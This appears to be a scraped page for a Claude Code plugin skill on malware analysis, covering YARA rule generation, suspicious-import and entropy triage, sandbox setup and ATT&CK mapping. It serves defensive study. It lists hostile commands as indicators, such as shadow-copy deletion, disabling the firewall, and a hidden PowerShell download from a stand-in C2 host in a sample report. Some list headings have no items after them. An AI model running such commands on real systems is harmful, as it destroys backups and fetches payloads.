Provides static and dynamic malware analysis, YARA rule generation, sandbox configuration, behavioral profiling, and malware family classification for cybersecurity investigations.
Triggered by: the user, by Claude, or both.
Slash command: /cybersecurity:05-malware-analysis
Summary Claude sees in its skill listing (used to decide when to auto-load this skill):
Enable Claude to assist with malware analysis workflows including static analysis of file properties and code, dynamic behavioral analysis interpretation, YARA rule generation, sandbox configuration, and malware family identification. Claude analyzes provided artifacts directly and orchestrates scripts for automated processing.
Safety Warning: Never execute suspicious files outside of isolated, controlled environments. Use dedicated VMs or sandboxes with network isolation and snapshot capability.
This skill activates when the user asks about:
Python dependencies:
```bash
pip install yara-python pefile python-magic requests ssdeep
```
Recommended analysis tools:
- Cuckoo Sandbox / CAPE — Automated dynamic analysis
- VirusTotal API — Multi-engine scanning and intel
- YARA — Pattern matching engine
- Ghidra / IDA Pro — Deep binary analysis (→ Skill 04)
- Volatility 3 — Memory forensics
- DIE (Detect-It-Easy) — Packer/compiler detection
- Pestudio — Windows PE static analysis
When the user provides a suspicious file or hash for analysis:
Claude performs analysis in this order:
Step 1 — File Identification:
```bash
file malware.exe        # File type from magic bytes
md5sum malware.exe      # MD5 hash (legacy, for lookups)
sha256sum malware.exe   # SHA-256 (primary identifier)
python scripts/static_analyzer.py --file malware.exe --hashes
```
Step 2 — Threat Intelligence Lookup:
```bash
# VirusTotal hash lookup via API
curl "https://www.virustotal.com/api/v3/files/<sha256>" -H "x-apikey: YOUR_KEY"
```
Step 3 — PE Analysis (Windows executables):
```bash
python scripts/static_analyzer.py --file malware.exe --strings --imports --output report.json
```
Look for these indicators in the output:
Suspicious Import Functions:
| Category | Suspicious APIs |
|---|---|
| Process Injection | CreateRemoteThread, WriteProcessMemory, VirtualAllocEx, NtMapViewOfSection, RtlCreateUserThread |
| Persistence | RegSetValueEx, CreateService, SHFileOperation, ITaskScheduler |
| Anti-Analysis | IsDebuggerPresent, CheckRemoteDebuggerPresent, GetTickCount, QueryPerformanceCounter, GetSystemInfo |
| Network C2 | InternetOpenUrl, HttpSendRequest, WSAStartup, socket, URLDownloadToFile, WinHttpOpen |
| Crypto Operations | CryptEncrypt, CryptDecrypt, BCryptEncrypt, CryptHashData |
| Credential Access | SamOpenDatabase, LsaOpenPolicy, NtlmGetUserInfo |
| Keylogging | SetWindowsHookEx, GetAsyncKeyState, GetKeyboardState |
| Defense Evasion | VirtualProtect, NtSetInformationProcess, Wow64DisableWow64FsRedirection |
Step 4 — String Extraction & Analysis:
```bash
strings -a malware.exe | grep -E "(http|ftp|/[a-z]|[0-9]{1,3}\.[0-9]{1,3}|HKEY|reg|cmd|powershell)"
```
Categorize extracted strings:
Step 5 — Entropy Analysis:
```bash
python scripts/static_analyzer.py --file malware.exe --entropy
```
| Entropy Range | Interpretation |
|---|---|
| 0.0 – 1.0 | Near-empty or all-zeros section |
| 1.0 – 5.0 | Normal code/data section |
| 5.0 – 7.0 | Compressed data or code |
| 7.0 – 8.0 | Encrypted or packed data — investigate |
| 7.9 – 8.0 | Highly suspicious — likely encrypted payload |
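To make Steps 3 and 5 concrete, here is an added Python example (not the skill's own scripts/static_analyzer.py) that scores section entropy against the table above and groups imported API names by the suspicious-import categories; pefile is not required, since callers pass raw section bytes and import names, and the function names are this example's own.

```python
import math
from collections import defaultdict

# Added example, not the page's scripts/static_analyzer.py: section entropy scoring
# and import triage following the two tables above; the API lists are copied from them.
SUSPICIOUS_IMPORTS = {
    "Process Injection": {"CreateRemoteThread", "WriteProcessMemory", "VirtualAllocEx",
                          "NtMapViewOfSection", "RtlCreateUserThread"},
    "Persistence": {"RegSetValueEx", "CreateService", "SHFileOperation", "ITaskScheduler"},
    "Anti-Analysis": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "GetTickCount",
                      "QueryPerformanceCounter", "GetSystemInfo"},
    "Network C2": {"InternetOpenUrl", "HttpSendRequest", "WSAStartup", "socket",
                   "URLDownloadToFile", "WinHttpOpen"},
    "Crypto Operations": {"CryptEncrypt", "CryptDecrypt", "BCryptEncrypt", "CryptHashData"},
    "Credential Access": {"SamOpenDatabase", "LsaOpenPolicy", "NtlmGetUserInfo"},
    "Keylogging": {"SetWindowsHookEx", "GetAsyncKeyState", "GetKeyboardState"},
    "Defense Evasion": {"VirtualProtect", "NtSetInformationProcess",
                        "Wow64DisableWow64FsRedirection"},
}
# Lower bound of each band from the entropy table, most suspicious first.
ENTROPY_BANDS = [(7.9, "Highly suspicious - likely encrypted payload"),
                 (7.0, "Encrypted or packed data - investigate"),
                 (5.0, "Compressed data or code"),
                 (1.0, "Normal code/data section")]

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def interpret_entropy(value: float) -> str:
    """Map an entropy value onto the table above (the 7.9+ band wins over 7.0+)."""
    return next((v for lo, v in ENTROPY_BANDS if value >= lo), "Near-empty or all-zeros section")

def categorize_imports(names):
    """Group imported API names by category; trailing ANSI/Unicode A/W suffixes are ignored."""
    hits = defaultdict(list)
    for name in names:
        base = name[:-1] if len(name) > 1 and name[-1] in "AW" else name
        for category, apis in SUSPICIOUS_IMPORTS.items():
            if name in apis or base in apis:
                hits[category].append(name)
    return dict(hits)
```

With pefile installed, feed each `section.get_data()` to `shannon_entropy` and each import's `imp.name.decode()` to `categorize_imports` to reproduce the script's `--entropy` and `--imports` views.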
When the user asks to create YARA rules from a sample or indicators:
Claude generates YARA rules following this methodology:
YARA Rule Templates:
```yara
import "hash"   // required for hash.sha256() in the Tier 1 rule

// Tier 1: Specific sample (hash-based)
rule MalwareFamily_Variant_Hash {
    meta:
        author = "Analyst Name"
        date = "2025-05-28"
        description = "Detects [MalwareFamily] [Variant] — specific sample"
        sha256 = "aabbcc..."
        tlp = "GREEN"
        reference = "https://example.com/analysis"
    condition:
        hash.sha256(0, filesize) == "aabbcc..."
}

// Tier 2: Family-level detection (behavioral strings)
rule MalwareFamily_Generic {
    meta:
        author = "Analyst Name"
        date = "2025-05-28"
        description = "Detects [MalwareFamily] family by strings and structure"
        tlp = "GREEN"
    strings:
        // C2 patterns
        $c2_ua = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" ascii
        $c2_uri = "/gate.php?id=" ascii
        // Crypto constants
        $rc4_key = { 52 43 34 5F 4B 45 59 }   // "RC4_KEY" hex
        // Mutex
        $mutex = "Global\\MSDTC_MUTEX_" ascii wide
        // Registry persistence key
        $reg_key = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii wide nocase
        // Anti-analysis check
        $vm_check = "VBOX" ascii wide nocase
    condition:
        uint16(0) == 0x5A4D and   // MZ header (PE file)
        filesize < 2MB and
        (
            (2 of ($c2_*)) or
            ($mutex and 1 of ($reg_key, $rc4_key))
        )
        and not $vm_check         // Exclude sandbox-aware variants
}

// Tier 3: Network IOC detection (for NIDS integration)
rule MalwareFamily_Network_C2 {
    meta:
        description = "Detects [MalwareFamily] C2 communication patterns"
        type = "network"
    strings:
        $beacon_path = "/api/v1/ping?uid=" ascii
        $beacon_ua = "MalBot/1.0" ascii
        $checkin_hdr = "X-Command-Key: " ascii
    condition:
        any of them
}
```
```bash
# Generate YARA rules using the script
python scripts/yara_generator.py --samples ./malware_samples/ --output rules.yar
python scripts/yara_generator.py --file single_sample.exe --rule-name "MalwareFamily" --output rule.yar
# Test rules against benign files
yara -r generated_rule.yar /usr/bin/ 2>/dev/null | wc -l   # Should be 0
yara generated_rule.yar malware.exe                        # Should match
```
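As an added example of the generation step (not the skill's own scripts/yara_generator.py), the following Python builds a Tier 2 style family rule from analyst-supplied string indicators, handling YARA identifier and string-escaping rules so the output has the shape of the template above; the function names and the optional yara-python compile check are this example's own.

```python
import re

# Added example, not the page's scripts/yara_generator.py: build a Tier 2 style
# family rule from analyst-supplied string indicators, handling YARA escaping and
# identifier rules so the output matches the template shape shown above.

def yara_identifier(name: str) -> str:
    """YARA identifiers allow only [A-Za-z0-9_] and must not start with a digit."""
    ident = re.sub(r"[^A-Za-z0-9_]", "_", name)
    return "_" + ident if not ident or ident[0].isdigit() else ident

def yara_text(value: str) -> str:
    """Quote a value as a YARA text string, escaping backslashes and double quotes."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'

def build_family_rule(family, indicators, min_matches=2, max_size="2MB", tlp="GREEN"):
    """indicators: {"mutex": "Global\\X", "c2_uri": "/gate.php?id="} -> rule source.
    Each entry becomes $<key> = "..." ascii wide; the condition requires the MZ
    header, a size bound and min_matches strings (capped at the number given)."""
    if not indicators:
        raise ValueError("at least one string indicator is required")
    lines = [f"rule {yara_identifier(family + '_Generic')} {{", "    meta:",
             f'        description = "Detects {family} family by strings"',
             f'        tlp = "{tlp}"', "    strings:"]
    for key, value in indicators.items():
        lines.append(f"        ${yara_identifier(key)} = {yara_text(value)} ascii wide")
    n = min(min_matches, len(indicators))
    lines += ["    condition:", "        uint16(0) == 0x5A4D and",
              f"        filesize < {max_size} and", f"        {n} of them", "}"]
    return "\n".join(lines) + "\n"

def compile_if_available(source: str):
    """Compile with yara-python when it is installed (pip install yara-python); else None."""
    try:
        import yara
    except ImportError:
        return None
    return yara.compile(source=source)
```

Run the generated text through `compile_if_available` before shipping it, and keep the `yara -r ... /usr/bin/` false-positive check from above as the acceptance gate.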
When the user provides sandbox analysis output or asks about dynamic analysis:
Interpreting Cuckoo/CAPE Sandbox Reports:
Claude analyzes behavioral reports looking for:
Process Tree Analysis:
Network Indicators:
File System Changes:
- vssadmin delete shadows → ransomware indicator
- \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Registry Modifications:
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- HKLM\SYSTEM\CurrentControlSet\Services\
MITRE ATT&CK Mapping:
| Observed Behavior | MITRE Technique |
|---|---|
| PowerShell download cradle | T1059.001 — PowerShell |
| cmd /c vssadmin delete shadows | T1490 — Inhibit System Recovery |
| Registry Run key persistence | T1547.001 — Registry Run Keys |
| CreateRemoteThread injection | T1055.001 — DLL Injection |
| Scheduled task creation | T1053.005 — Scheduled Task |
| netsh advfirewall set allprofiles state off | T1562.004 — Disable Host Firewall |
| UAC bypass (fodhelper.exe) | T1548.002 — Bypass UAC |
| LSASS memory access | T1003.001 — LSASS Memory |
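An added example, not part of the skill's scripts, of applying the mapping above to a sandbox report: it walks a simplified, constructed Cuckoo/CAPE-style process tree and registry write list and emits the matching technique IDs; the JSON shape, the regexes and the sample values are assumptions of this example, not the real report schema or real indicators.

```python
import re

# Added example, not part of the skill's scripts: walk a Cuckoo/CAPE-style process
# tree and registry write list (a constructed, simplified subset of the report JSON)
# and map what is seen to the ATT&CK techniques in the table above. Regexes are mine.
COMMAND_RULES = [
    (r"vssadmin(\.exe)?\s+delete\s+shadows", "T1490", "Inhibit System Recovery"),
    (r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off", "T1562.004", "Disable Host Firewall"),
    (r"schtasks(\.exe)?\s+/create", "T1053.005", "Scheduled Task"),
    (r"\bfodhelper\.exe\b", "T1548.002", "Bypass UAC"),
    (r"powershell.*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", "T1059.001", "PowerShell"),
]
REGISTRY_RULES = [
    (r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", "T1547.001", "Registry Run Keys"),
]

def walk(process):
    """Yield every node of a nested {"command_line": ..., "children": [...]} tree."""
    yield process
    for child in process.get("children", []):
        yield from walk(child)

def map_techniques(report):
    """Return sorted, de-duplicated (technique_id, name, evidence) triples."""
    findings = set()
    for proc in walk(report["process_tree"]):
        cmd = proc.get("command_line", "")
        for pattern, tid, name in COMMAND_RULES:
            if re.search(pattern, cmd, re.IGNORECASE):
                findings.add((tid, name, cmd))
    for key in report.get("registry_written", []):
        for pattern, tid, name in REGISTRY_RULES:
            if re.search(pattern, key, re.IGNORECASE):
                findings.add((tid, name, key))
    return sorted(findings)

# Constructed sample report; paths and hostnames are placeholders, not real IOCs.
SAMPLE_REPORT = {
    "process_tree": {
        "command_line": "C:\\Users\\analyst\\Desktop\\invoice.exe",
        "children": [
            {"command_line": "cmd /c vssadmin delete shadows /all /quiet", "children": []},
            {"command_line": "powershell -w hidden -c Invoke-WebRequest http://c2.example/a -OutFile a.exe"},
        ],
    },
    "registry_written": ["HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"],
}
```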
When the user asks to identify or classify a malware sample:
Classification by behavioral patterns:
| Family Indicators | Likely Family Category |
|---|---|
| Shadow copies deleted + file encryption + ransom note | Ransomware |
| Regular HTTP beaconing + command execution + lateral movement | RAT/Botnet |
| Browser credential theft + banking overlay | Banking Trojan |
| Keylogging + screenshot capture + data exfiltration | Spyware/Infostealer |
| Process hollowing + covert persistence | Rootkit/Backdoor |
| Cryptocurrency mining process spawning | Cryptominer |
| Worm propagation via network shares | Worm |
| Document with macro downloading payload | Dropper/Downloader |
Similarity analysis:
```bash
# SSDeep fuzzy hash comparison
ssdeep -l malware.exe > hash.txt
ssdeep -m hash.txt similar_sample.exe
# Similarity > 70% → likely same family/variant
```
When the user asks to set up a malware analysis environment:
Minimum isolation requirements:
Recommended sandbox stack:
```text
Analysis VM (Windows 10/11 or Ubuntu):
├── FakeNet-NG or INetSim — Simulate network services
├── Wireshark — Capture network traffic
├── ProcessMonitor (Windows) / strace (Linux) — Monitor syscalls
├── Regshot (Windows) — Compare registry before/after
├── Autoruns (Windows) — Monitor persistence locations
└── Cuckoo/CAPE Agent — Automated collection
Network Layer:
└── Host-only adapter → no real internet → INetSim captures C2 attempts
```
Anti-anti-VM measures:
For every analyzed sample, produce:
## Malware Analysis Report — [Sample Name]
**Hashes:**
- MD5: [hash]
- SHA1: [hash]
- SHA256: [hash]
- SSDeep: [fuzzy hash]
**Classification:** [Ransomware / RAT / Infostealer / etc.]
**Confidence:** [High / Medium / Low]
**Family:** [Family Name, if identified]
**First Seen:** [Date from TI sources]
**Network IOCs:**
- IPs: [list]
- Domains: [list]
- URLs: [list]
- User-Agent: [string]
**Host IOCs:**
- File Paths: [list]
- Registry Keys: [list]
- Mutex Names: [list]
- Services: [list]
**MITRE ATT&CK Mapping:**
- [Tactic]: [Technique ID] — [Technique Name]
**YARA Rules:** [Attached]
**Sigma Rules:** [Attached, for Skill 12]
static_analyzer.py:
```bash
python scripts/static_analyzer.py --file malware.exe --output report.json
python scripts/static_analyzer.py --file sample.dll --hashes --strings --imports --entropy
```
yara_generator.py:
```bash
python scripts/yara_generator.py --samples ./malware_samples/ --output rules.yar
python scripts/yara_generator.py --file single_sample.exe --rule-name "MyMalware" --output rule.yar
```
| Condition | Adjacent Skill |
|---|---|
| Needs deeper disassembly | → Skill 04 (Reverse Engineering) |
| IOCs ready for environment-wide hunting | → Skill 06 (Threat Hunting) |
| Malware collected during IR | ← Skill 07 (Incident Response) |
| Create detection signatures | → Skill 15 (Blue Team Defense) |
Aligned to the current threat landscape:
rundll32, mshta, regsvr32, msbuild) and PowerShell/.NET reflective loads.
Safety rule: detonate only in an isolated, snapshot-restored VM with no production network reachability; document the sandbox config in the report.
Install the plugin:
```bash
npx claudepluginhub masriyan/claude-code-cybersecurity-skill --plugin cybersecurity
```